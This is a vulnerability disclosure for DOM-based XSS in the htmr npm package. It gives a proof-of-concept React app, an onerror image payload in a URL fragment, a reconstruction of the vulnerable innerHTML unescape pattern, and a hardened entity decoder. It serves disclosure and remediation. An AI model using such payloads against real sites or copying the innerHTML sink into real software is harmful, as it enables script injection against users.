Hi,
I would like to report DOM-based XSS in htmr.
It allows attackers to insert a malicious JavaScript payload into the page.
module name: htmr
version: 0.8.6
npm page: https://www.npmjs.com/package/htmr
Simple and lightweight (< 2kB) HTML string to react element conversion library
6,877 weekly downloads
This module uses innerHTML to unescape HTML entities. Because innerHTML parses its input as live markup, this leads to DOM-based XSS when an HTML-encoded XSS payload is inserted into the converted string (see PoC).
PoC:
1. Create a new React app: create-react-app xss-htmr
2. Install the htmr module: cd xss-htmr; npm i htmr
3. Change the src/App.js file to this:

import React from 'react';
import convert from 'htmr';

export default function App() {
  // Untrusted input from the URL fragment is passed straight into convert()
  return convert(`<p>Hash: ${window.location.hash}</p>`);
}

4. Run npm run start
5. Open http://localhost:3000/#<img/src/onerror=alert('xss')> in the browser, an alert will pop up.
Thank you and regards,
Visat
DOM-based XSS
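As an added example (not htmr's code and not part of Visat's report): a string-based entity decoder that never assigns untrusted text to innerHTML, shown beside a reconstruction of the innerHTML pattern the report describes. unescapeViaInnerHtml is an assumption about the shape of the vulnerable code, not htmr's actual source, and is browser-only; decodeEntities and NAMED_ENTITIES are names chosen here.

```javascript
// Added example, not htmr's source. Contrasts the innerHTML-based unescape
// pattern described in the report with a decoder that only manipulates strings.

// Reconstructed vulnerable pattern (assumption, not htmr's actual code).
// Assigning untrusted text to innerHTML parses it as live markup, so a string
// that a library's own tag parser treated as "text" (e.g. <img/src/onerror=...>)
// still creates elements and fires event handlers in the page. Browser-only.
function unescapeViaInnerHtml(str) {
  const el = document.createElement('div');
  el.innerHTML = str; // DOM-based XSS sink
  return el.textContent;
}

// Hardened replacement: entity references are resolved by string substitution.
// The output is always a plain string and nothing is ever parsed as markup.
// Small named-entity table; a full HTML5 table can be substituted as needed.
const NAMED_ENTITIES = {
  amp: '&', lt: '<', gt: '>', quot: '"', apos: "'", nbsp: '\u00A0',
};

// Matches &name; , &#123; and &#x1F; forms. The terminating ';' is required.
const ENTITY_RE = /&(#x[0-9a-f]+|#[0-9]+|[a-z][a-z0-9]*);/gi;

function decodeEntities(str) {
  // String.prototype.replace performs a single pass, so the output of one
  // substitution (e.g. "&amp;lt;" -> "&lt;") is never re-decoded.
  return str.replace(ENTITY_RE, (match, body) => {
    if (body[0] === '#') {
      const cp = body[1].toLowerCase() === 'x'
        ? parseInt(body.slice(2), 16)
        : parseInt(body.slice(1), 10);
      // Leave NUL, surrogates and out-of-range code points undecoded.
      if (!Number.isFinite(cp) || cp === 0 || cp > 0x10ffff ||
          (cp >= 0xd800 && cp <= 0xdfff)) {
        return match;
      }
      return String.fromCodePoint(cp);
    }
    const named = NAMED_ENTITIES[body]; // case-sensitive lookup
    return named === undefined ? match : named;
  });
}

module.exports = { decodeEntities, unescapeViaInnerHtml, NAMED_ENTITIES };
```

The decoded result is a string, so a renderer such as React will escape it again when it is emitted as a text child; the encoded payload from the PoC comes back as inert text instead of a live element.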